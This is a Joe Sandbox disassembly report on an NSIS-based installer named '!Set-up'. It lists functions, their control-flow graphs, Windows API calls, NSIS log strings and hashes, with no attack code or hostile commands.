                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2740478559-0
                                                              • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                              • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                              Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 795 401eb9-401ec4 796 401f24-401f26 795->796 797 401ec6-401ec9 795->797 798 401f53-401f7b GlobalAlloc call 406831 796->798 799 401f28-401f2a 796->799 800 401ed5-401ee3 call 4062cf 797->800 801 401ecb-401ecf 797->801 816 4030e3-4030f2 798->816 817 402387-40238d GlobalFree 798->817 802 401f3c-401f4e call 406035 799->802 803 401f2c-401f36 call 4062cf 799->803 813 401ee4-402702 call 406831 800->813 801->797 804 401ed1-401ed3 801->804 802->817 803->802 804->800 808 401ef7-402e50 call 406035 * 3 804->808 808->816 828 402708-40270e 813->828 817->816 828->816
                                                              APIs
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GlobalFree.KERNELBASE(00863740), ref: 00402387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FreeGloballstrcpyn
                                                              • String ID: %IsraeliSales%$Exch: stack < %d elements$Pop: stack empty
                                                              • API String ID: 1459762280-1719584793
                                                              • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                              • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                              Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 830 4022fd-402325 call 40145c GetFileVersionInfoSizeW 833 4030e3-4030f2 830->833 834 40232b-402339 GlobalAlloc 830->834 834->833 836 40233f-40234e GetFileVersionInfoW 834->836 838 402350-402367 VerQueryValueW 836->838 839 402384-40238d GlobalFree 836->839 838->839 840 402369-402381 call 405f7d * 2 838->840 839->833 840->839
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                              • GlobalFree.KERNELBASE(00863740), ref: 00402387
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                              • String ID:
                                                              • API String ID: 3376005127-0
                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                              Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 846 402b23-402b37 GlobalAlloc 847 402b39-402b49 call 401446 846->847 848 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 846->848 853 402b70-402b73 847->853 848->853 854 402b93 853->854 855 402b75-402b8d call 405f96 WriteFile 853->855 857 4030e3-4030f2 854->857 855->854 861 402384-40238d GlobalFree 855->861 861->857
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                              • String ID:
                                                              • API String ID: 2568930968-0
                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                              Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 863 402713-40273b call 406035 * 2 868 402746-402749 863->868 869 40273d-402743 call 40145c 863->869 871 402755-402758 868->871 872 40274b-402752 call 40145c 868->872 869->868 875 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 871->875 876 40275a-402761 call 40145c 871->876 872->871 876->875
                                                              APIs
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                              • String ID: %IsraeliSales%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                              • API String ID: 247603264-4002239702
                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                              Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 884 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 895 402223-4030f2 call 4062cf 884->895 896 40220d-40221b call 4062cf 884->896 896->895
                                                              APIs
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                              • API String ID: 3156913733-2180253247
                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                              Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: nsa
                                                              • API String ID: 1716503409-2209301699
                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                              Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                              • String ID: HideWindow
                                                              • API String ID: 1249568736-780306582
                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                              Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                              Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
